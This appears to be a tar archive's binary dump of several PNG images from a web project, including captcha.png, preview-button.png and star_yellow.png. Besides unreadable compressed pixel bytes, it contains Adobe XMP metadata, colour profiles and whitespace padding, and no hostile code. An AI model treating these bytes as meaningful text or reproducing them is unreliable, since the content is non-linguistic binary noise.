Ş�l?�␔�)!��[��F��o��wi&k^�CV(t@p�W2���{h�x�H�GRn�͉�eCb�xԉ����6G�������Q��d27\�ثd�S��=\�F�f*�0�ۣ�OP���5(r�ZߙxQ�Z>�~G�AeN-��jY��7�Ҿn;�n?ӹ"P��x�}���/�N��W:݊&��׾��:x"ꭥу;��R�펔���c䛅љ�������ElmG§a=�h�¨BG_�u���YnZ쫭FYs �U�"zM&�:��Gn��u�.�DX���5Xn�����;�}�ԫ%XO?�~2&����Frjj���8��yA���*�W	������I�����9/��u�b)��Z�l:�s�� 8�5��J��>~�i�������I<�k��¶
�٤�^�S�x�[����s��GD����(�+��"E���HnֆA_��\F�Z���%������?�4`���w��_{�7��"��0�Y��@�f}������PEj�m��v:�Q������rN��[w��z�*���5�c?�j������f�7���?K_�P��', sZ(oT
|��Ó\-%�蔒�h���y������\	cK/	˧YGԻڐ����z&c"*�(,����y�E�q(�y�[���q`�a�7Xļ��~�����R���/��{h�h���"�g��=w���ݠ�՗���?���̶�uNh{�g�?tq���m�,�u�[�Y���ot��+�!�hf��.2]�ݹ?�&��wA�R���F�ľ붾Ue���%��d��l�i����q��Ms&�6�X�w-&�Y�3(���G9��{cׁ�֬ǿM��;����v��n�"���b��)�<�׾���e_�1���p���}��11��F#��YX��p�q]��s��,[�%*&��@�D�f��ҹA�ٙfs���,���>��3Y�ԕ;�:#hEL�ם[ROd��^G�A�˩f�~Y!����E���n��0�~��/�A��
�K�m���>^��WY�q�"���<цF����*c��:x�w�|�͞w��%�ehRg������d�9�̕���v�3�v
Dg��h�>>?��3�h�YDk�gC�(ʹƒ�ԕ���S����Ԝ|�
2Q��94�(�?OG�Q34�
f�cc��PopT�Ya��W(�>�@�t�X4�`�LG�ٞp��Ʉ�a��Űl\�[9�c�26��UM6f,����'����C���4�i<D�n��#�x��г
Hz5�[�
�_�����Qt��m�vN�C_��`��x���~
Mb
s�PEx���؇;�cW��*n\��?���׿v�:O��3@f����R�&�e�����m�[mٜC���5f(�M����Ni��YX�xШ���=�4
y�HO�<�0|���3���[��B	:d1�"Z�O$+Kx�i̒=�s��J����g���~�i[Rz'����G�#�v��}�>�?W~p�sϠ?��k��A��K�rŵ���k@�I�|>^x�s�?�\��`,D��̒�����5��W���^���w�D��M���Xf_8<%|8_왉pP�1����W��lm߃���f?4����:��́�_�Ԕv ���M�;k�:p�����_��sj؎qw]$F��}���y�
��,b'��N��=�o�����0,
������~��M���
Y�R���4�6+!��}@~u�j�ct�C��P.�Y(�x�׎����z�?70�WXFܣ�o�����3z����0���c8�R��G��g�0��T�U��򄽻��w�"/4��֏�����C�Q`[{O���c�n�]��+�{�{�����N!�3��<���V��yx�,!C
�b�.��lf���'��\ ן�����gu,μ���w-/��3ۥ����N���X(�c
����o�MD�s��a�#�#0{c
���%�uDWCB�Z�A��Z6�,؏�x�(Z%�����w���HbhTb2��<$��*c���nk���_�א����#{D+B<�!��S/�g�Ï`�9��.^]��ß��C��+>��3�+��5��]�q����p�j'
r�9��FDȬ)~:�����9Gm��x2���-?s�raG"yvU��pa;R���ă� �A�\&���
�?�#��n	��0�ee����d~o�q嶭�!!DzP^H)>�o��ȑ.�ļ�Զ=Hy�7�S�-M�
�?��8y�c���ߧq�|�#�5"�2Б�l�m#��U�����e�Τ�V���bM���͘�jA�c7�Z
�]>4�gb�
���s	2WRsKg�6���
's8qz�TT[�R�[w��)I��9�5x���Wj��
#�!nN+zP��ڔ�	�Kg��TE�,�����?��{�^R�Dݥ=�R�u^zîc������&D��'i74�S�J�ߔ��&H��U�G�[���cr�ͦ��<����׿~��4}څ��h���;���lpAZ�%�X�Z;t�Q?������y��k1+Ƴu6�[������D��c4�Ɯ����*d��B#!}�e>�samh����G3c^��8u9󼵕⸈߂�U�y��B;f"Y�i=�D�=����4��&�����|�C���3���g]�~���WgjhSIXU��"1A5Fr4�{����A��lj�w�T����t6<�/N�� �\����R�t��a|�i���>�T.�Wo>>�x��ϯ�Y���{緷m,J�{gg}�v~)�]��s!?w��X�����G�F��l!7��U��|Cn�fﳅ:.@mq%��臔���Ru?.��:��aB�ֺ��E#G�g'yX�D�u�SW��NJD)��21�ѵ�V��agW��P���q����Ȓ��s�?¶�@�g")���s\�T���{��f3g��o��^w:^�"��{��d#�!φt�}�,n�yWFKv�„X�4��|<��B+���8�i=�-;��X	5l=/xl��w���n�]� 
�+S�Ӽ,{՞�/Д�V���+<<
�����o �����ԇeNp�^O�����OvqR� �wHF3�݁�=o��;�`~k�R�wC���u¦�k�jE�|��qϩ���KV,���*?��xk��}Q�x�U���/M�����=��հp����=犐�^x�Bˏ���Kx���@�[���I���YB]T��➐����Kq�.ὀP��w����AG\�W�ϋ���9���2S���A\�Y\��y=Ǩ�Gj�����բ�M�@�tԂ��vD���z�+���Bĺ\������լ����6��k�6L��ʦ�R�_r�n�l|UAϯ<
���|��!��;��8�_1�g�sލ��C����� >�VB�~�,����˘_�&f���jp�/W�ԍ�wa�O ���H3����I`���u����1�ͤ������+_��W��|�+_��W��|�+_��W��|�+_��W��|�+_��W��|�+_��W��|�+_��W��|�+_��W��|�+_��W��|�+_��W��|�+_��W��|�+_��W��|�+_��W��|�+_��W��|�+_��W��|�+_��W����ݚ�w)��2iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmp="http://ns.adobe.com/xap/1.0/">
         <xmp:CreatorTool>Adobe Fireworks CS6 (Windows)</xmp:CreatorTool>
         <xmp:CreateDate>2012-08-14T17:23:06Z</xmp:CreateDate>
         <xmp:ModifyDate>2012-08-14T17:23:58Z</xmp:ModifyDate>
      </rdf:Description>
      <rdf:Description rdf:about=""
            xmlns:dc="http://purl.org/dc/elements/1.1/">
         <dc:format>image/png</dc:format>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                            
<?xpacket end="w"?>�2NlIDATH��;hTQ��l|M!D0(��Q0�
�J�Fр�i,Rh!�RA[KA,��6�"-,�H
��@�c5�M>�{Vnֳ�{H�=���?3wf�֩,��?�bҲ��+�N`/��E�.�xd�V5+Po����z]ݞ�_�f��
�t�lD=�P��NЀzDݦ�Tw�'ԡ�\Z�唣w����ꏔM�|��S�����V�L��V����'՞��e>���|����`8���	ܤ��&:K���=
�����E�~Xw�|���6��ݯ�䌶�=!Ⓔ�R�\��)�;04�)�r�0V#�r6K�d�0��VWq�����~��gS$E�N�MҼF�lY�+6䧁~��F�}�ڰ�
���H��֞Ze>����=�3lO~L��XenV/�cAJ=ZM?v���y�"�!��zR�6y0��OS:%��\��v�7�ݿ}!�,4|�Ib���G�����
��S}*�N�)��ߙ�H��v[���
O��^O�R��)�I�4�L�0��V'�t��fnL9���LЩOq�	|��
�W������$Y)��H��|��R:�dlQ�s�#�����IEND�B`�images/next.png000060400000010744152434416630007507 0ustar00�PNG


IHDR7%��A@
7iCCPsRGB IEC61966-2.1x���wTS��Ͻ7�P����khRH
�H�.*1	J��"6DTpDQ��2(�C��"��Q��D�qp�Id�߼y�͛��~k����g�}ֺ����LX	��X��ň��g`�l�p��B�F�|،l���� ��*�?������Y"1P�����\�8=W�%�Oɘ�4M�0J�"Y�2V�s�,[|��e9�2�<�s��e���'�9���`���2�&c�tI�@�o�|N6(��.�sSdl-c�(2�-�y�H�_��/X������Z.$��&\S�������M���07�#�1ؙY�rf�Yym�";�8980m-m�(�]����v�^��D��W~�
��e���mi]�P����`/���u}q�|^R��,g+���\K�k)/��C_|�R����ax�8�t1C^7nfz�D����p�柇��u�$��/�ED˦L L��[���B�@������ٹ���ЖX�!@~(* 	{d+��}�G�͋љ���ς�}W�L��$�cGD2�Q��Z4 E@�@������A(�q`1��D ������`'�u�4�6pt�c�48.��`�R0��)�
�@���R�t C���X��CP�%CBH@�R����f�[�(t�
C��Qh�z#0	��Z�l�`O8�����28.����p|�O�X
?���:��0�FB�x$	!���i@ڐ���H���[EE1PL���⢖�V�6��QP��>�U�(j
�MFk�����t,:��.FW������8���c�1�L&���ӎ9�ƌa��X�:��
�r�bl1�
{{{;�}�#�tp�8_\<N�+�U�Zp'pWp���������e�F|~?��!(�	��HB*a-���F8K�KxA$��N�p����XI<D<O%�%QHf$6)�$!m!�'�"�"� ��Fdr<YL�Bn&�!�'�Q�*X*(�V+�(t*\Qx��W4T�T\���X�xDqH�^�H���QZ�T�tT�Ҵ2U�F9T9Cy�r���G,ň�C�Q�(�(g(cT��OeS��u�F�Y�8
C3��Ri��oh��)���J�J�J��q)�����2�a�u�;U-UOU��&�6�+����y���J���F�ީ3�}��Է�w���@i�i�k�j��8��tm��9���ք5�4#4Wh��М������Ҫ�:��T�����C����U�MG��C��c�
Ó�Ψd�1�t5u�u%�����3z�zQz�z�z��	�,�$����S:!��
�,��]�������b�6u=2V30�7n5�kB6q7Yf�`r�c�2M3�mz�6�7K1�12����͇-�NB��Lӓ��le�Z�-�--�,�YX�[m��hmo�n�h}džbhSh�c󫭙-׶��\�\߹��v�}ngnǷ�cwӞjb��������ȡ�a��1ѱ����
cmf�wB;y9�v:����Y�|��K�K�ˣy���獹�r\�]�n�D��nRw]w�{��}�G�DŽ��g��A�g^�^"���lg�J�)o��ϻ�{Ї��S�s�W�7ٷ�w���o��)���6�Z܀怩@���}A��A�A�͂E�=!pH`����
��w��Ѐ��ŒÖ�}�	�	aQѿ��`ɂ��"�"�"�D�DI�z�����_�xǔ�Hc�bW�^�ӈ�u�c����,ܹp<�>�8�"�Ey�.,�X�����%�%Gщ1�-��9����Ҁ��K��l�.��oo���/�O$�&�'=JvMޞ<��R��T�T����֥�NM۟�)=&�=���qTH�	�2�3�2��̳���˜��\6%
5eCً���4��Ԁ�D�^2��S��&7:�H�r�0o`���M�'�}�^�Z�]�[�[��`t���UЪ��zW�.Z=��ó���ik(�.,/|�.f]O�Vњ���~�[��E�76�l�ۈ�(�8�iMKx%K�K+J�o�n����W�_}ڒ�e�̡l�V�V����ܷ(W.�/���scGɎ�;��PaWQ���K�KZ\�]eP���}uJ�H�WM{�f��׻y������V�UWZ�n�`��z������}�}9�6F7����I�����~�~遈}͎��-�-e�p��u�`���x���l�o����$�����A�{����}g�]m����\�9Օ�%��>x��ǥ��{���=Vs\�x�	‰��N柜>�u�����c�Kz=s�/�o�l����|ϝ��?y�����^d]��p�s�~���:;���/;]��7|���W����p������Q�o�H�!�ɻ��V���sn��Ys}��ҽ����~4��]� =>�=:�`��;cܱ'?e��~��!�ań�D�#�G�&}'/?^�x�I֓���?+�\����w�x�20;5�\�ӯ�_�����e�t��W�f^��Qs�-�m���w3���+?�~���O�~���pf*	pHYsMMg��SIDATx��Y{lE���(�*�!������@�
EE$ 	��BE��Ey#��m��j����D���ȫ�Р�J��,-�Qn{��3~3�w�;����W��lfgvf~��'QJ�Gz=�:��6H� @)�u!��Zw*���4	liE%��:]�T�!�:�TM؅(��#)KF��Ux�&&�`mn�� >�ɞJ����������;���?_k�]��?Z��K����0�Ʃ�z�~��lW�ے$������+lq����X��jγX;�I9��%�����̪��8u�?�d��=:��lt���D�\k0���U�B�4���_"Z����Wz�&�w�^�\�l�VD�i��a��ǐ�a������$w��&x�)㶁�
�V�bA�1�}Z@�巙�m���SZ˱'Rtl�C0K���J����PU���#N�.s���-LP��5ڨ�C�Ԛ��j3Z��x�����8hg��޵`�-�reF���@[J��<4J��sS������KS�2��s�	sNP��g�=�l|5����;>rk�Lj���;�Q���8�x���A;S	Ǝ���væ��iLB5��*UD՚�T�pc�R�%FO�`M���R����8�Ǩ�n�sn�f��^��$K� �����XD3m�xi���#A8��V��Z��w������#C�����f�I�8f2p��o��j�,<;i�l�#h���T%���S�F��b���Կ��
�l�l�A]�����o2\[B����6���t�6p�^@�fM�Ź/�]�wh�`8 �$�Q]��O.]��̀R���6��{>
u�n�����;��k��?���p&���
��՞9ڽ"?�$�qc��	�F��=�uZ��ӒC�a00�Ē
_;�y���
�“VT\׫_���]�%
�?3q���9U���τ�n�H�+u�w��Λ.HO�Ll�}�������C+[20Y��t�+��d�j�f)���ZYm��-U�ʭ��ɟ�6*����r����m�J�:=������5ڐ�BqN�IP�r$`"�ƻ��c>�)FL�����=��FF��?�K�:�y�^�#TuMw��_���tM˃���qM�f,�k<}��p�� ��������y�g�pf�6#����svNDv0⼑R=gpI ?��K�3C�����i}P6~`�hQ䓺.��v.g�It�\�1`�j��ӓ�řZ]����Lay�$Js�HӂH�'��
c<,4D��B,�
=��JCr�<Uqf�g��wO``���hs�c�	R�CpFm{�B���orjuʢ��f(�6H�i6,Q�h%��m<���̊[��*�%V��f=����t]UW�ܻe��V+Ȱh��J&0�)���w~
�`��E,٦�
L��\*�4����,���^��$����l_�䷜����`'�8'��ޒ)%u�� l�?�N����ʰ(����?�un)҉�S�(���z����#b�B&���6"�*�u��\�ر{J��C�;�^��{j��c�ޢ�۷�JӉ ���:���`W�rr�r�z�{^/ѻ���`��׮D_�`[�q;����-2s������&���L�/�;�ٻ��Q�5�Ӵ��ܡ����t�GA��z�dBH1�:��3wT2��auF��r�a�dO4�8�gO���,g�j��g�f�X�ƂxXq-P��.�T����B��S]-P��3�f�<�~5���4癣��tw�ª���kŞ̣�	�G��\��u�*�(�Hހ�[�k6T��r�>:��P��io2+Y���`�Y�IEND�B`�images/border2.png000060400000000241152434416630010057 0ustar00�PNG


IHDR���qtEXtSoftwareAdobe ImageReadyq�e<CIDATx���!1Ar
���$�^;+f{U�����̈P�O�!�B!�B�kfnWw�3�#��nkRIEND�B`�images/preview-button.png000060400000004442152434416630011521 0ustar00�PNG


IHDR.*�/Y�tEXtSoftwareAdobe ImageReadyq�e<�iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:18080b63-60d0-0b4a-a65d-56af76170233" xmpMM:DocumentID="xmp.did:176AD6868ED711E5B39DE1D49B5E558A" xmpMM:InstanceID="xmp.iid:176AD6858ED711E5B39DE1D49B5E558A" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:b96fe927-d5f6-5b42-b353-3431724eb4aa" stRef:documentID="adobe:docid:photoshop:a229b3b6-8dc8-11e5-908b-ca098794a1d9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�FU4IDATx�bt[s�?�Ā�%{���F+-T����<%,$��|�ĝ_�x���� F�\�3؆���pS�
���w$�U�k�������U�
��Qg��_�,W#�/Tx�8��Y�}v<h�v�����Lk
�2XK�{�?����.�@��i&�C�h�!j����(N���L� [s�)C�����EB��MV?��+X�mwn���W|��k���i��5X�{�Q��m(A���Ȱ5�n-z�C��?��cK�tg�"9���%��p|��<�&�fz����"�\`�ڣ�N�xG���������U^
��~,�����l
)}�dǩ��,����J�	n�� zϣWpu�������Z��e�t �s�.Ö{�lf�y���l���g�\wW��M�X@�˨�T*�`�PnU�a���/�'�V�z��?��	0t��ٯ��׎�\��"��}�ʐ��<>�w`M�U��2"`v���֤ �]�
X����n�2��`��M'����5a�y��
��]_�
��+|��@�p��,���5B���aXr�1�����%Њa%�@j��KI40�`j�1��0������fs�0���_y�5.1�X�h���h3�����-p��F��c���fd��9����oЍy���5�@ͣ�?3$�<X���_{���xKEd��(��\�G0Y�h烗`<Zp�F�
zȆʨ�G>�p6�pj֬���7��)����[�0l���n{E�r�zq�)�����x°��`+�M�l�ʉ3Dk�2�ۂ�Ԓ5v��'�	 �r83C��J�~���Pz�2�w��|[i�@U)y>.����34���p��'�zE~n�~=�V\|�����5��`P��8(9l��p4T�
v4�U��ȭzN[�����<��q�';8�A����W0�����-��xhA�h��x��4VqP���h@�Xdv5_a���Mp��%PϷ?�mdL���%��X@!4�W��FYW�|�!
�(
Y0���<��]�f̽�>��as��2�w��qəT���Hn��(�O�|gh<v����o��V��L�����/4]Hrs0�[j��928��
C�[��2�nP>Y�,=`�L�U���'�dp	�ўA���
R+�É��s��g8������[�����qc1ApZ��`}<P��0�o���p����o?�c`�* �`#� ��h�?��Q��:�s0�"&���IEND�B`�images/captcha.png000060400000005723152434416630010135 0ustar00�PNG


IHDR**���[tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:27C32476C7F611E48A9FBF09268FA1E2" xmpMM:DocumentID="xmp.did:27C32477C7F611E48A9FBF09268FA1E2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:27C32474C7F611E48A9FBF09268FA1E2" stRef:documentID="xmp.did:27C32475C7F611E48A9FBF09268FA1E2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�+WHIDATx��Y	T����Y`@Y�!d	ID��PmkΉ�$�j�钘����i�i��&G=I=�11h�Z�V��S5���ՍE�}Q�e���az�cf�bP�9��3�{����}���5q�M&<BH%D"	����NB7��PJ�'&4��ŤaU� ,'�d�h�G���a�<��~�g�>&�d�$��}�a�=k�wĈF�C�M�`$L�H�vXm���1Q�9B
F��R2y�L�%wBt%a7aF�$J@w��0X�<���������p4t�t��9Л%�ɏ�P���$�M�����
}a���tx���o��'E��� xc,M��Qo�;W<nFt٨e��% ��ͪ��U�'��z;ʂ�'��󑫱��yo\���.�x�@����� BH�DU�$�G;��c�������Z͐�dT�%I�~��_S����1#9�^�T��g��B%|���+`�Z\�
�I᎐	����.S�`%�˪�����dx9m�%·�bF��g��[r_�����U\�	�j�����+���5v]=?�I���io�+���cp	�妆�M��N8Ù�a����ݛ�A�k���=�K&���`�rP����]��E�Yt܈��79
e�j�5vbὙ�Qy��k__��)
?�NCʔx�O
�t��D|p4�罋������ރթO���4�!(j)w����T����!�����^~�r�V�(�$�ҁ��Ȉx�>�Sk��f��9��w��w�gU�R�I�K}�����MD%�;�A��DR�{��.�V���䅘��l�x�����"
O��ǮK���(�E�Dا&"��8�VN.,���;�9�8y3��z|F���:�܃4M��|�%���q�(��
�/��j6�)F=cr��$/�֓��r�F��ՉAqph���+��ŇŠ&��D�,��	�@���\��@X%�{��Wq�=zL�2�R)���˹��,�k�<����a�&���P�I�f���H���6C�8��]-*{�þ�|.���p/�&���:CT�Ce.��H��uWq��ͺk��hDT���c�qV��;F�U�_�~��^� y��8�I3�MCg+�e��f�j�a��T��h�9ц=�z�hp�,����koF��Q����o��ً��.�r,i5P\���S���*n�Ө��<o���*+Ν6�H�XA�%<��:N�]�Y/�3
cn����_I��
[�D-e��XL�']>9��
q��Q�8'mlPޤ�ro�җ(J%�E���̹�DK�x����׏��m$xGHٮ�E]��.<�dB�j/�/_�#�������#%E�8e�A����7�QN�L�̈Yxi��D�7v����:��O�V�{/���9K�E�=�aᗴV�pW�գB[�i~a��"��j�fA����mxj�\��=�3DR���a�A������F��eX�ū"[�mT
��D\���\��5q�F&�ǒ}�X��,�1Q��)axv��V�G���OY.�w��
�,�vw��'j.�ȳ�#�f�0M�"!	�l�?Wg;S_�Oi�p�
�9QtL��P�Yѡ����|�p�`�OYNE�G�Z�x
�8��ɜn�<똭�&���w���
{.���2���+�&�e��ܬsl�,%|8�VO����U��8~�X��&'׍+�V[rj���δ���WD
����^�zs'I�$���do_!�U��ئ\g��.�F�v	�w�)I�2O��%��䵛m@|K��	�cDU�
(��7���`��6&4[�[�I/�jț=��$Sʎ�7������[�>�7��C~��<�]5����bsx�m)P�[�V쵓l�F���6T��)�F)��q�y1�T����ڣ�d��b'&y�V�Pe��M4.�
���]�	5����H�F���6K�j������z������C�b�t#=���������s��O�BC�_aԛ�&O���B{�}uD��qI{�LJo���b>:D]I+�1� Le�LH���gK=vt���5q�۹�r�`D�FDjIEND�B`�images/3_2.png000060400000005250152434416630007110 0ustar00�PNG


IHDR�t�
7iCCPsRGB IEC61966-2.1x���wTS��Ͻ7�P����khRH
�H�.*1	J��"6DTpDQ��2(�C��"��Q��D�qp�Id�߼y�͛��~k����g�}ֺ����LX	��X��ň��g`�l�p��B�F�|،l���� ��*�?������Y"1P�����\�8=W�%�Oɘ�4M�0J�"Y�2V�s�,[|��e9�2�<�s��e���'�9���`���2�&c�tI�@�o�|N6(��.�sSdl-c�(2�-�y�H�_��/X������Z.$��&\S�������M���07�#�1ؙY�rf�Yym�";�8980m-m�(�]����v�^��D��W~�
��e���mi]�P����`/���u}q�|^R��,g+���\K�k)/��C_|�R����ax�8�t1C^7nfz�D����p�柇��u�$��/�ED˦L L��[���B�@������ٹ���ЖX�!@~(* 	{d+��}�G�͋љ���ς�}W�L��$�cGD2�Q��Z4 E@�@������A(�q`1��D ������`'�u�4�6pt�c�48.��`�R0��)�
�@���R�t C���X��CP�%CBH@�R����f�[�(t�
C��Qh�z#0	��Z�l�`O8�����28.����p|�O�X
?���:��0�FB�x$	!���i@ڐ���H���[EE1PL���⢖�V�6��QP��>�U�(j
�MFk�����t,:��.FW������8���c�1�L&���ӎ9�ƌa��X�:��
�r�bl1�
{{{;�}�#�tp�8_\<N�+�U�Zp'pWp���������e�F|~?��!(�	��HB*a-���F8K�KxA$��N�p����XI<D<O%�%QHf$6)�$!m!�'�"�"� ��Fdr<YL�Bn&�!�'�Q�*X*(�V+�(t*\Qx��W4T�T\���X�xDqH�^�H���QZ�T�tT�Ҵ2U�F9T9Cy�r���G,ň�C�Q�(�(g(cT��OeS��u�F�Y�8
C3��Ri��oh��)���J�J�J��q)�����2�a�u�;U-UOU��&�6�+����y���J���F�ީ3�}��Է�w���@i�i�k�j��8��tm��9���ք5�4#4Wh��М������Ҫ�:��T�����C����U�MG��C��c�
Ó�Ψd�1�t5u�u%�����3z�zQz�z�z��	�,�$����S:!��
�,��]�������b�6u=2V30�7n5�kB6q7Yf�`r�c�2M3�mz�6�7K1�12����͇-�NB��Lӓ��le�Z�-�--�,�YX�[m��hmo�n�h}džbhSh�c󫭙-׶��\�\߹��v�}ngnǷ�cwӞjb��������ȡ�a��1ѱ����
cmf�wB;y9�v:����Y�|��K�K�ˣy���獹�r\�]�n�D��nRw]w�{��}�G�DŽ��g��A�g^�^"���lg�J�)o��ϻ�{Ї��S�s�W�7ٷ�w���o��)���6�Z܀怩@���}A��A�A�͂E�=!pH`����
��w��Ѐ��ŒÖ�}�	�	aQѿ��`ɂ��"�"�"�D�DI�z�����_�xǔ�Hc�bW�^�ӈ�u�c����,ܹp<�>�8�"�Ey�.,�X�����%�%Gщ1�-��9����Ҁ��K��l�.��oo���/�O$�&�'=JvMޞ<��R��T�T����֥�NM۟�)=&�=���qTH�	�2�3�2��̳���˜��\6%
5eCً���4��Ԁ�D�^2��S��&7:�H�r�0o`���M�'�}�^�Z�]�[�[��`t���UЪ��zW�.Z=��ó���ik(�.,/|�.f]O�Vњ���~�[��E�76�l�ۈ�(�8�iMKx%K�K+J�o�n����W�_}ڒ�e�̡l�V�V����ܷ(W.�/���scGɎ�;��PaWQ���K�KZ\�]eP���}uJ�H�WM{�f��׻y������V�UWZ�n�`��z������}�}9�6F7����I�����~�~遈}͎��-�-e�p��u�`���x���l�o����$�����A�{����}g�]m����\�9Օ�%��>x��ǥ��{���=Vs\�x�	‰��N柜>�u�����c�Kz=s�/�o�l����|ϝ��?y�����^d]��p�s�~���:;���/;]��7|���W����p������Q�o�H�!�ɻ��V���sn��Ys}��ҽ����~4��]� =>�=:�`��;cܱ'?e��~��!�ań�D�#�G�&}'/?^�x�I֓���?+�\����w�x�20;5�\�ӯ�_�����e�t��W�f^��Qs�-�m���w3���+?�~���O�~���pf*	pHYs��~�IDATx�c���`abbb�������1IEND�B`�images/star_yellow.png000060400000001721152434416630011070 0ustar00�PNG


IHDRB �	pHYs�� cHRMz%������u0�`:�o�_�FWIDATxڬ��o[Uƿ9�\�_?j�N��Ƀ"A�$X�!6��@b�
G�,�T�,ر)k�Ъ Q$JR%i�Np��$����a�Q��0�3�7��|C�/����[�t
�r'D�cE2�_L
�fO��/�������W�0�]���W��"�{���Cy���ߑ�V/�T�ٷG{��K'w��!�bx��WI�3ѿ[������*`䃁KL�p:zx�Z�R+�@�E^ �)%�D�?��g��W�l����ӫ����o+�ء�r��y��@�x�U>w:Z�&��3�HU�cU$�CHi ���>6��E<�.%����#?�S��Y�Emi?!���e�)!��g
�#a�fj�ub����#}j�F��fqmi�զQ���쏷�?/�'dž�@�ǫX�6��[�*4�C�	a�����|���Ս, ��#�aP(����d�(p�W���%͝c������Z���(�p���V��͸J�x�n���qh����|q/	��Zb�բ�n~��ú�qH�9>��J������d�́a�@�^tّ�r�a&t�ߕ@�%:R�wޓ\$�6��^�t�~T�� �ARx�0���x�3e�)N�n#��`R��J
��#�*��@N �Q��L}O:�+�^#�
�,��=ȗ2�\�wn������G3[�Gz�]��"T(@��e�A7O3�v�b%��v/6v�/W�E.Ia�;������̟y=W�?Y~�Lߦ���@���ҷ�J���J�x��$�qU���]��Ja���+���o�>P҄i~j	&�v�2P��+D|p��kJ�զQ9me��k��s�Au�BV,IEND�B`�images/page_edit.png000060400000006546152434416630010457 0ustar00�PNG


IHDR''��b	pHYs��
OiCCPPhotoshop ICC profilexڝSgTS�=���BK���KoR RB���&*!	J�!��Q�EEȠ�����Q,�
��!��������{�kּ�����>�����H3Q5��B������.@�
$p�d!s�#�~<<+"��x��M��0���B�\���t�8K�@z�B�@F���&S�`�cb�P-`'������{[�!�� e�Dh;��V�EX0fK�9�-0IWfH�����0Q��){`�##x��F�W<�+��*x��<�$9E�[-qWW.(�I+6aa�@.�y�2�4�������x����6��_-��"bb��ϫp@�t~�,/��;�m��%�h^�u��f�@����W�p�~<<E���������J�B[a�W}�g�_�W�l�~<�����$�2]�G�����L�ϒ	�b��G�����"�Ib�X*�Qq�D���2�"�B�)�%�d��,�>�5�j>{�-�]c�K'Xt���o��(�h���w��?�G�%�fI�q^D$.Tʳ?�D��*�A�,����`6�B$��BB
d�r`)��B(�Ͱ*`/�@4�Qh��p.�U�=p�a��(��	A�a!ڈb�X#����!�H�$ ɈQ"K�5H1R�T UH�=r9�\F��;�2����G1���Q=��C��7�F��dt1�����r�=�6��Ыhڏ>C�0��3�l0.��B�8,	�c˱"����V����cϱw�E�	6wB aAHXLXN�H� $4�	7	�Q�'"��K�&���b21�XH,#��/{�C�7$�C2'��I��T��F�nR#�,��4H#���dk�9�, +ȅ����3��!�[
�b@q��S�(R�jJ��4�e�2AU��Rݨ�T5�ZB���R�Q��4u�9̓IK�����hh�i��t�ݕN��W���G���w
��Ljg(�gw��L�Ӌ�T071���oUX*�*|��
